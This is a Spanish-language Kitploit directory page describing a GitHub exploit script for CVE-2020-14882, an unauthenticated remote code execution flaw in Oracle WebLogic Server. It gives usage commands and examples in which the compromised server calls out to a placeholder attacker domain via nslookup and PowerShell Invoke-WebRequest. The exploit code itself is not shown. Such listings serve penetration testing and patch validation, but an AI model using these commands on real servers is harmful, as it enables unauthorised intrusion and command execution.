Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-14882 — Este script permite la ejecución remota de código (RCE) en Oracle WebLogic Server. | Kitploit
Herramientas/GitHubGitHub/danny-lli/cve-2020-14882
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

Este script permite la ejecución remota de código (RCE) en Oracle WebLogic Server.

Ver Repositorio
212hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-14882

Este script permite la ejecución remota de código (RCE) en Oracle WebLogic Server mediante una solicitud GET no autenticada. Explota la vulnerabilidad CVE-2020-14882. Al ejecutar comandos arbitrarios, un atacante puede obtener acceso no autorizado al servidor.

Detalles del Exploit

  • Título del Exploit: Oracle WebLogic Server, RCE no autenticado mediante solicitud GET
  • Autor del Exploit: Danny Safaya
  • CVE: CVE-2020-14882
  • Página del proveedor: Oracle WebLogic Server
  • Enlace del software: Descargas de Oracle Middleware
  • Más información: Análisis de WebLogic RCE con una sola solicitud GET (CVE-2020-14882)

Uso

Asegúrate de tener Python 3 instalado. Para usar este script, sigue los pasos a continuación:

  1. Abre una terminal o símbolo del sistema.

  2. Ejecuta el script usando el siguiente comando:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Reemplaza http(s)://target:7001 con la URL objetivo del Oracle WebLogic Server, y command con el comando deseado a ejecutar.

Ejemplo 1:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"

Este ejemplo ejecuta el comando nslookup your_Domain en el servidor objetivo.

Ejemplo 2:

root@kitploit:~
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"

Este ejemplo ejecuta el comando de PowerShell Invoke-WebRequest -Uri http://your_listener en el servidor objetivo.

Advertencia

Este script está destinado únicamente a pruebas de penetración autorizadas y fines de investigación de seguridad. El uso no autorizado de este script para explotar sistemas sin el consentimiento adecuado es ilegal y puede acarrear consecuencias legales. Úsalo bajo tu propio riesgo.

Dependencias

Este script requiere las siguientes dependencias:

  • requests
  • urllib3

Asegúrate de que estas dependencias estén instaladas antes de ejecutar el script.

Descargar herramienta